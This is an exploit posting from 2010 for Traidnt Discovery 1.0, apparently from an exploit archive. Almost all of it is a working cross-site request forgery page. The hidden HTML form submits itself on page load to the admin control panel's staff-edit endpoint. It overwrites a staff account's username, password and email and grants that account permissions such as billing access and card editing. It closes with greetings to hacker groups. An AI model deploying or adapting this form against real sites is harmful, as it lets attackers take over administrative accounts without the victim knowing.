# Exploit Title: Traidnt Discovery - [CSRF/Change Username & Password] Staff
Account
# Date: 16-06-2010
# Author: G0D-F4Th3r
# Software Link: https://discovery.traidnt.com/demo/
# Version: 1.0

====================================[form]================================================
<html>
<form name="r00t" action="
https://www.site.com/[path]/admincp/staff.php?do=edit&id=1&go=update"
method="POST">
<body onload="document.forms.r00t.submit();">
<input type="hidden" name="username" value="staff-username"/>
<input type="hidden" name="password" value="staff-password"/>
<input type="hidden" name="email" value="mail@mail.com"/>
<input type="hidden" name="realname" value="Discovery"/>
<input type="hidden" name="sig" value="discovery ..."/>
<input type="hidden" name="viewsig" value="1"/>
<input type="hidden" name="receivemsg" value="1"/>
<input type="hidden" name="cat_array[]" value="1"/>
<input type="hidden" name="cat_array[]" value="3"/>
<input type="hidden" name="cat_array[]" value="2"/>
<input type="hidden" name="viewserver" value="1"/>
<input type="hidden" name="viewonline" value="1"/>
<input type="hidden" name="sendmsg" value="1"/>
<input type="hidden" name="accessbill" value="1"/>
<input type="hidden" name="editcard" value="1"/>
<input type="hidden" name="editcomm" value="1"/>
<input type="hidden" name="service" value="1"/>
<input type="hidden" name="olduser" value="staff-username"/>
</form>
</body>
</html>
====================================
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends